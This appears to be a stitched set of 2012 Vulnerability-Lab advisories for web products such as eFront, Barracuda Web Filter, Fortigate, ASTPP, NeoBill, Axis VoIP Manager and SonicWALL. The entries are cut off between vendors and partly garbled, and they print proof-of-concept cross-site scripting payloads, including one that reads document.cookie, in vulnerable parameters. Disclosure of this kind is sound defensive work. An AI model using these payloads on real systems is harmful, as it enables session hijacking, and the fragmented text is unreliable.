PoC: http://opstor.127.0.0.1:1338/availability730.do ?days=iframe src=http://www.vuln-lab.com onload=alert(XSS)/iframe name=iframe src=http://www.vuln-lab.com onload=alert(XSS)/iframe Solution: = 2012-08-07: Vendor Fix/Patch Manually steps to apply the patch/fix: 1. Download the patch and place it in AppManager_home directory. (AppManager_Home is the directory in which Applications Manager is installed, default location is C://Program Files (x86)/ManageEngine/AppManager10) 2. Extract the patch under AppManager_home. If prompted for a file replace, replace the existing file with the file from the Patch. (or you can extract the zip file and copy the server.xml from the zip to the location as shown in the below structure). 3. After extracting ensure you have the Server.xml file as per the below provided structure: AppManager_home | .working ...apache ...tomcat ...conf ...backup .server.xml 4. Shut Down Applications Manager Software 5. Rename Logs folder path or variable 6. Start Applications Manager after the change 7. Done! PATCH DOWNLOAD: http://bonitas.zohocorp.com/customer_uploads/2012_8_16_10_12_39_BadInput_10600.zip Risk: = 1.1 The security risk of the blind SQL injection vulnerability is estimated as critical. 1.2 The security risk of the persistent input validation vulnerability is estimated as medium(+). 1.3 The security risk of the client side cross site vulnerabilities are estimated as low(+). Credits: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
eFront Educational v3.6.11 - Multiple Web Vulnerabilities
Title: == eFront Educational v3.6.11 - Multiple Web Vulnerabilities Date: = 2012-08-03 References: === http://www.vulnerability-lab.com/get_content.php?id=666 VL-ID: = 666 Common Vulnerability Scoring System: 3.5 Introduction: = Tailored with larger organizations in mind, eFront Educational offers solutions for the management of companies most valued asset - the people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Educational platform offers the means of aligning learning programs with business goals to cultivate employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational. (Copy of the Vendor Homepage: http://efrontlearning.net/product/ ) Abstract: = A Vulnerability Laboratory Researcher of the Vulnerability Laboratory Team discovered multiple web vulnerabilties in eFront v3.6.11 Educational. Report-Timeline: 2011-08-03: Public Disclosure Status: Published Affected Products: == eFront Product: Educational v3.6.11 Exploitation-Technique: === Remote Severity: = High Details: Multiple persistent input validation vulnerabilities are detected in the eFront Educational v3.6.11 Content Management System. The vulnerabilities allow remote attackers to implement/inject malicious script code on the application side (persistent). The first vulnerability is located in the profile module with the bound vulnerable firstname lastname parameters. The bug allows a low privileged student account to exploit higher privileged trainer or administrator user accounts via registration. Exploitation of the first vulnerability requires low privileged student elearning application user account. The secound vulnerability is located in the Messages - New Folder Name module with the bound vulnerable folder listing. Exploitation of the secound vulnerability requires low privileged student user account is only local exploitable. Successful exploitation of the vulnerabilities can lead to persistent session hijacking (manager/admin) or stable (persistent) context manipulation. Vulnerable Module(s): [+] Profile - User (Administrator User Listing) [+] Messages Vulnerable Parameters(s): [+] Firstname Lastname [+] Foldername Proof of Concept: = The persistent input validation vulnerabilities can be exploited by remote attacker with a privileged student account. For demonstration or reproduce ... Review: Administrator - User Listing (Firstname Lastname) tr id=row_student class=oddRowColor tda href=http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personaluser=student; class=editLinkspan id=column_studentiframe src=administrator.php-[PERSISTENT INJECTED SCRIPT CODE!])' = d.= (student)= span=/a/td Affected URL(s): http://efront.127.0.0.1:137/educational/www/student.php?ctg=personaluser=studentop=profile http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=users http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personaluser=studentop=profile Review: Messages - Add New Folder Name - Listing td span class=counter4./span a href=http://efront.127.0.0.1:137/educational/www/student.php?ctg=messages; folder=10iframe src=student-[PERSISTENT INJECTED SCRIPT CODE!])' (0= messages,= 0kb)= a= /td td Risk: = The security risk of the persistent web vulnerabilities are estimated as high(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section
eFront Enterprise v3.6.11 - Multiple Web Vulnerabilities
%2Fwww %2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]'); iframe src=student-[PERSISTENT INJECTED SCRIPT CODE!])' = a=span id = edit_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!] style = display:noneinput type = text value = [PERSISTENT INJECTED SCRIPT CODE!]) onkeypress = if (event.which == 13 || event.keyCode == 13) {Element.extend(this).next().down().onclick(); return false;}/ a href = javascript:void(0)img id = editImage_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]src = 'themes/default/images/others/transparent.gif' class = 'sprite16 sprite16-success' style = vertical-align:middle onclick = editFile(this, $('span_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%[PERSISTENT INJECTED SCRIPT CODE!]').innerHTML, Element.extend(this).up().previous().value, 'directory','\[PERSISTENT INJECTED SCRIPT CODE!]) ') border = 0/a/span/tdtd/td td27 Jul 2012, 23:38/td URL: http://efront.127.0.0.1:1339/enterprise/www/student.php?ctg=personaluser=traineeop=files Review: PANEL Index - Write something about yourself (Only local exploitable!) td span class=leftOptionTrainee D. (trainee) /span span style= id=statusText onclick=javascript:showStatusChange() iiframe src=student3-[PERSISTENT INJECTED SCRIPT CODE!])' = i=/iframe/i/span input class=inputText id=inputStatusText style=display: none; value= [PERSISTENT INJECTED SCRIPT CODE!];) onblur=changeStatus() img style=visibility: visible; progressimage=anonymous_element_16 id=statusTextProgressImg src=student3-Dateien/transparent.gif class=ajaxHandle sprite32 sprite32-edit alt=Click to change status title=Click to change status onclick=javascript:showStatusChange() /td URL: http://efront.127.0.0.1:1339/enterprise/www/student.php?ctg=personaluser=traineeop=dashboard Risk: = The security risk of the persistent web vulnerabilities are estimated as high(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities
Title: == Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities Date: = 2012-08-02 References: === http://www.vulnerability-lab.com/get_content.php?id=570 Barracuda Networks Security ID: BNSEC-279/BNYF-5533 VL-ID: = 570 Common Vulnerability Scoring System: 4.5 Introduction: = The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful, easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware from your organization. No more productivity loss trying to repair computers or make computers usable again. Blocks access to Web sites based on domain, URL pattern, or content category Blocks downloads based on file type Blocks applications that access the Internet, including IM, music services, and software update utilities Integrates with safe search filters built into popular images search engines Provides integrated gateway and desktop spyware protection Uses Barracuda Web Security Agents compatible with Windows PC’s and Macs to enforce Internet policies on off-network computers The Barracuda Web Filter combines preventative, reactive, and proactive measures to form a complete Web filtering solution. Designed for the enterprise, the Barracuda Web Filter enables you to set up custom policies for particular users and groups across customizable time ranges. The Barracuda Web Filter integrates with popular LDAP directory servers, such as Microsoft Active Directory, for both authentication and group membership information on which to apply custom policies. Sample uses of group policies include: Restricting access to job board Web sites to only the Human Resources group Defining separate policies for teachers and students at a school Enabling compliance officers unrestricted access to the Web for investigation Providing external instant messaging (e.g., AIM) access only to specific users or groups Restricting personal Web browsing to non-working hours For organizations that do not utilize directory servers, policies can be defined for unauthenticated users as a whole, locally defined users and groups, or network IP address ranges. (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/web-filter-overview.php ) Abstract: = The Vulnerability Lab Research Team discovered multiple Web Vulnerabilities in Barracudas Web Filter Application v5.0.0.015 Appliance Model 910. Report-Timeline: 2012-05-01: Researcher Notification Coordination 2012-05-08: Vendor Notification 2012-06-13: Vendor Response/Feedback 2012-07-25: Vendor Fix/Patch 2012-08-02: Public or Non-Public Disclosure Status: Published Affected Products: == Barracuda Networks Product: Barracuda Web Filter Appliance 910 v5.0.0.015 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the Barracudas Web Filter Application v5.0.0.015 Appliance Model 910. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action. The vulnerability is located in the NTLM Edit - Host Domain Name which is bound to the affected vulnerable Existing Authentication Services listing. Another vulnerability is located on the upload key tab in combination with the unsanitized short domain name input field + output listing. Vulnerable Module(s): [+] Authentification New Authentication Service [-] NTLM - Server Hostname Domain Name - Existing Authentication Services [+] Authentification Kerberos Advanced Settings [-] Upload Key Tab File in combination with alternative Short Domain Name Picture(s): ../1.png ../2.png Proof of Concept: = The persistent web vulnerabilities can be exploited by remote attackers with high[-](medium+) user inter action or via local low privileged user account with low require user inter action. For demonstration or reproduce ... Review: NTLM Edit Listing td colspan=2 style= valign=top width=285input autocomplete=off id=UPDATE_ntlm_server_hostname: md5UBwQ8iCjrc1egk1wTV8SEg name=UPDATE_ntlm_server_hostname:md5UBwQ8iCjrc1egk1wTV8SEg size=30 value= [PERSISTENT SCRIPT CODE EXECUTION!] type=textbrdiv nowrap
Knowledge Base EE v4.62.0 - SQL Injection Vulnerability
. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
Title: == Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities Date: = 2012-09-06 References: === http://www.vulnerability-lab.com/get_content.php?id=557 VL-ID: = 557 Common Vulnerability Scoring System: 5 Introduction: = The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including: * Firewall, VPN, and Traffic Shaping * Intrusion Prevention System (IPS) * Antivirus/Antispyware/Antimalware * Web Filtering * Antispam * Application Control (e.g., IM and P2P) * VoIP Support (H.323. and SCCP) * Layer 2/3 routing * Multiple WAN interface options FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies. Since 2009 Fortigate appliance series got certified by the U.S. Army and is now listed in the Information Assurance Approved Products List (IA APL). The military provides high security standards to secure outdoor camps, air base, offices with fortigate hardware. (Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate ) Abstract: = Vulnerability-Lab Research Team discovered multiple persistent Web Vulnerabilities in the FortiGate UTM Appliance Application. Report-Timeline: 2012-05-06: Researcher Notification Coordination 2012-05-10: Vendor Notification 2012-06-11: Vendor Response/Feedback 2012-08-25: Vendor Fix/Patch ( Fixed in FortiOS v4.3.8 B0537 Fixed in FortiOS v5.0 ) 2012-09-06: Public or Non-Public Disclosure Status: Published Affected Products: == Fortigate Product: UTM Appliance Application vFortiGate-5000 Series;FortiGate-3950 Series;FortiGate-3810A; Exploitation-Technique: === Remote Severity: = High Details: Multiple input validation vulnerabilities(persistent) are detected in the FortiGate UTM Appliance Application. Remote attackers low privileged user accounts can inject (persistent) own malicious script code to manipulate specific customer/admin requests. The vulnerability allows an local low privileged attacker to manipulate the appliance(application) via persistent script code inject. The vulnerability is locaed in the Add or Tags module category listing with the bound vulnerable applied tags tags display parameters. Successful exploitation results in content module request manipulation, execution of persistent malicious script code, session hijacking, account steal persistent phishing. Vulnerable Module(s): (Persistent) [+] Tags - Applied tags [+] Add - Tags Display Interface - UTM WAF Web Application [Appliance] FortiGate-5000 Series;FortiGate-3950 Series;FortiGate-3810A;FortiGate-3600A;FortiGate-3016B;FortiGate-1240B FortiGate-800;FortiGate-620B;FortiGate-311B;FortiGate-310B;FortiGate-300A;FortiGate-224B;FortiGate-200B Series Proof of Concept: = The persistent vulnerabilities can be exploited by remote attackers with low required user inter action or low privileged user account. For demonstration or reproduce ... Code Review:Tags - Applied tags [Box] Listing URL: http://appliance.127.0.0.1:1337/firewall/policy/policy6?expanded=# name=``addr_dlg`` action=``/firewall/address/add`` onsubmit=``if (!fwad_form_check('Please choose one address/group.', 'Please choose one interface to connect.')) return false; if (document.forms[0].submitFlag) return false; document.forms[0]. submitFlag = true;`` tabletbodytr td align=``left`` width=``150``nobrAddress Name/nobr/td td align=``left``input name=``name`` size=``64`` maxlength=``63`` value=``all`` type=``text`` /td /tr tr tdColor/td tdspan colorclassprefix=``addr_ipv6_ `` class=``icon_fw addr_ipv6_13`` id=``addressIcon``/span a href=``#`` id=``addressColor`` cscolorvalue=``0``[Change]input value=``13`` name=``csColor1`` type
ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities
;div style=text-align: center; width: 70px; white-space: normal;daily/div/div/tdtd align=centerdiv style=text-align: center; width: 50px; white-space: normal;div style=text-align: center; width: 50px; white-space: normal;No/div/div/tdtd align=center div style=text-align: center; width: 90px; white-space: normal;div style=text-align: center; width: 90px; white-space: normal;Customer/div/div/tdtd align=centerdiv style=text-align: center; width: 90px; white-space: normal; div style=text-align: center; width: 90px; white-space: normal;Active/div/div/tdtd align=centerdiv style=text-align: center; width: 120px; white-space: normal;div style=text-align: center; width: 120px; white-space: normal;a href=http://demo.astpp.org/accounts/payment_process/asdsadfas%20;[PERSISTENT INJECTED SCRIPT CODE]= = class=icon style=text-decoration:none;background-image:url(/images/payment.png); rel=facebox title=ProcessPayment amp;nbsp;lt;/agt;lt;a href=http://demo.astpp.org/accounts/account_detail/asdsadfas Review: DIDs li label class=descAccess Number:/label input name=access_number class=text field medium size=20 readonly=readonly type=text[PERSISTENT INJECTED SCRIPT CODE]@108.163.242.106=/iframe input name=id value=11 type=hidden /li li label class=descNote:/label input name=note class=text field medium size=10 type=text[PERSISTENT INJECTED SCRIPT CODE])' =/iframe /li li label class=descStatus:/label select name=status class=select field medium option value=0 selected=selectedACTIVE/option option value=1INACTIVE/option /select Review: Trunks td align=centerdiv style=text-align: center; width: 329px; white-space: normal; a href=http://demo.astpp.org/lcr/trunks/edit/;[PERSISTENT INJECTED SCRIPT CODE]' class=icon style= text-decoration:none;background-image:url(/images/page_edit.png); rel=facebox title=Update /aa href=/lcr/trunks/delete/iframe src=a onload=alert(/ class=icon style=text-decoration:none;background-image:url(/images/delete.png); title=Delete onClick=return get_alert_msg(); /a/iframe/a/div/td/tr/tbody/table div style=display: none; class=iDiv/div/div Review: Taxes fieldset style=width:585px; legendspan style=font-size:14px; font-weight:bold; color:#000;Taxes Information/span/legend li label class=descPriority:/labelinput class=text field medium value=0 name=taxes_priority size=20 type=text /li li label class=descAmount:/labelinput class=text field medium value=0. name=taxes_amount size=20 type=text /li li label class=descRate(%):/label input class=text field medium value=0. name=taxes_rate size=8 type=text /li li label class=descDescription:/label input class=text field medium type=text[PERSISTENT INJECTED SCRIPT CODE])' = name=taxes_description size=8/iframe /li /fieldset Risk: = The security risk of the persistent web vulnerabilities are estimated as high(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form
NeoBill CMS v0.8 Alpha - Multiple Web Vulnerabilities
://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C neobill.127.0.0.1:1339/neobill/manager/manager_content.php?page=view_log_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3Clog=1 Search: neobill.127.0.0.1:1339/neobill/manager/manager_content.php ?page=services_serverssubmit=search_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C Register Domain: neobill.127.0.0.1:1339/neobill/manager/manager_content.php ?page=domains_registersubmit=register_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C New Domain Service: neobill.127.0.0.1:1339/neobill/manager/manager_content.php ?page=services_new_domain_servicesubmit=new_%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VLABS%22%29%20%3C Risk: = 1.1 The security risk of the persistent input validation vulnerability is estimated as high. 1.2 The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+)|(-)medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities
Title: == Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities Date: = 2012-09-09 References: === http://www.vulnerability-lab.com/get_content.php?id=686 VL-ID: = 686 Common Vulnerability Scoring System: 2.3 Introduction: = Feel free to create Schedules (in PBX Features), Inbound Routes, User Extensions (individually or using Bulk Generator in Extensions Directory), Feature Dial Codes (in PBX Features - Feature Dial Codes), IVR Menus (in PBX Features), ACD Queues, etc. (Copy of the Vendor Homepage: http://www.axint.net/voip/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple cross site scripting vulnerabilities in the Axis VoIP Manager v2.1.5.7. Report-Timeline: 2011-09-07: Public Disclosure Status: Unpublished Affected Products: == Axis Product: VoIP Manager v2.1.5.7 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple non persistent cross site scripting vulnerabilities are detected in the Axis VoIP Manager User Portal v2.1.5.7. The vulnerability allows an attackers (remote) to hijack website customer, moderator or admin sessions with medium or high required user inter action. The bugs are located on client side in the contact_chooser.cgi and contacts.cgi files with the bound vulnerable lastname, firstname, department, contact or manageg_usr application parameters. Successful exploitation result in application account steal, client side phishing client-side content request manipulation. Exploitation requires medium or high user inter action without privileged web application user account. Vulnerable Module(s): [+] contact_chooser.cgi [+] contacts.cgi Vulnerable Parameter(s): [+] lastname, firstname department [+] contact [+] managed_usr Proof of Concept: = The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user inter action and without privileged application user account. For demonstration or reproduce ... Selection Filter https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100type=1type_selector=2lastname=lastname_match=1firstname= firstname_match=1department=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3Cdepartment_match=1action=Select https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100type=1type_selector=2lastname= lastname_match=1firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3Cfirstname_match= 1department=department_match=1action=Select https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100type=1type_selector=2; lastname= %22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3Clastname_match=1firstname=firstname_match= 1department=department_match=1action=Select Contact Chooser https://voip01.127.0.0.1:5999/asterisk/contact_chooser.cgi?contact=%22%3E %3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C managed_usr - listing https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?type=2usr=demo-100managed_usr=%22%3E%3Ciframe%20src= a%20onload=alert%28%22HI%22%29%20%3Ctype_selector=2lastname=lastname_match=1firstname= firstname_match=1department=department_match=1action=Select+ Risk: = The security risk of the non persistent (client side) cross site scripting vulnerabilities are estimated as low(+)|(-)medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com
SonicWALL EMail Security 7.3.5 - Multiple Vulnerabilities
=safeModeNoOfQuarantine size=3 value=iframe src=a [EXECUTE/INJECT PERSISTENT CODE!]) id=safeModeNoOfQuarantine ... or input type=text name=safeModeNoOfMessageFromOneUser size=3 value=iframe src=a [EXECUTE/INJECT PERSISTENT CODE!]) id=safeModeNoOfMessageFromOneUser URL:http://esserver.127.0.0.1:8080/virus_config.html PoC: Compliance Module - Approval Ordner - Listing Exceptions tbodytrtd background=policy_approval_box_summary-Dateien/nav_bar_background.gif width=24 img src=policy_approval_box_summary-Dateien/clear.gif height=15 width=4/tdtd border=0 background=policy_approval_box_summary-Dateien/nav_bar_background.gifspan class=columnApproval- Ordner/span/tdtd border=0 background=policy_approval_box_summary-Dateien/nav_bar_background.gif span class=columnNachrichten, die eine Genehmigung erfordern/span/tdtd background=policy_approval_box_ summary-Dateien/nav_bar_background.gif /td/trtr td height=12 /td tda href=http://esserver.demo.sonicwall.com/policy_approval_box.html ?pathname=[INJECTED PERSISTENT CODE!]iframe src=policy_approval_box_ summary-Dateien/a.htm [EXECUTION OF PERSISTENT CODE!] = a=/td td0/td tddiv align=rightinput type=button name=delete class=button value=Löschen URL: http://esserver.127.0.0.1:8080/policy_approval_box_summary.html 1.2 The client side cross site scripting vulnerability can be exploited by remote attackers with medium required user inter action. For demonstration or reproduce ... PoC: http://esserver.127.0.0.1:8080/alert_history.html?from=200%253ciframe%2520src%3Da%2520onload%3Dalert%28document.cookie%29%2520%253c 